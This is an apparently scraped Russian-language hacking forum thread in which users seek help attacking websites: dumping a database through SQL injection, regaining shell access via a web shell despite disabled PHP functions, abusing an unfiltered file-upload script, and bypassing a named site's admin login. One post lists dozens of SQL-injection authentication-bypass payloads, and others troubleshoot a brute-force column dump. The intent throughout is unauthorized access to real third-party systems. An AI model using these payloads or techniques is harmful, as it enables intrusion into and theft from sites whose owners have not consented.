Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?
Всем доброй ночи! хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются Собственно модули апача и список выключенных функций: Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source,posix_getpwuid,posix_setuid,posix_uname,cmd,escapeshellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec,phpinfo,php_uname,mail,mb_send_mail Крик души! Если есть какие-нибудь варианты буду рад обсудить! P.S. Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!
это как будто викторина без конца, по ключевым словам вопрос гуглится очень хорошо, если ты перепробуешь то что уже придумано, и это не работает, то стоит подкорректировать вопрос упомянув что уже было испробовано
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом) Хтмл формы для заливки нет. Как мне вообще создать запрос на отправку файла? И чем его отправить? Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
Ничего не понял. Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
Создаёшь файл на рабочем столе index.html Открываешь файл и пишешь: HTML: <form action="[ адрес скрипта аплоада ]" method="post"> <input type="file" name="[ имя параметра ]"> <input type="button" value="Залить"> </form> Затем открываешь index.html в браузере
Я вкурсе, спасибо) Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять) Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был. http://clip2net.com/s/3PSUKqs
Вот таой замечательный сайт Spoiler: 1 cyber-cafe.ru/admin/ вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор? Или иногда ошибка бывает простой ошибкой без возможности авторизации? Spoiler: 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Code: RewriteEngine On RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.* RewriteRule .* - [F]
Что я сделол неправильно Code: <Directory /admin/> <files controler.php> RewriteEngine On RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?localhost/.* RewriteRule .* - [F] </files> </Directory>
Directory нельзя использовать в .htaccess, только в конфигурационном файле. Вот так можно попробовать: Code: <If "%{REQUEST_URI} == '/admin/controller.php'"> RewriteEngine On RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.* RewriteRule .* - [F] </If>
Помогите пожалуйста. Нашел DB, нашел в ней таблицы, но при попытке найти колонны, соглашаюсь на поиск через файл перебором, выставляю 1 поток, но он очень быстро прогоняет и затем крашится. Снова можно эксплуатировать примерно через час, пытался загрузить прокси, не помогло. Может кто то сталкивался с этим? Еще нет DB Information_schema. Может тоже влияет на это? Spoiler: screenshots http://prntscr.com/hicbz6 , http://prntscr.com/hiccg8
Сделал только что так: вписал в текстовик только (email, password). Кастомный перебор, нашел эти 2 колонки. Краш прекратился, но попробовал дамп, получил ошибку.. Названия нашлись, а вот нумерации нет, что это значит? Spoiler: screenshot https://prnt.sc/hictfm
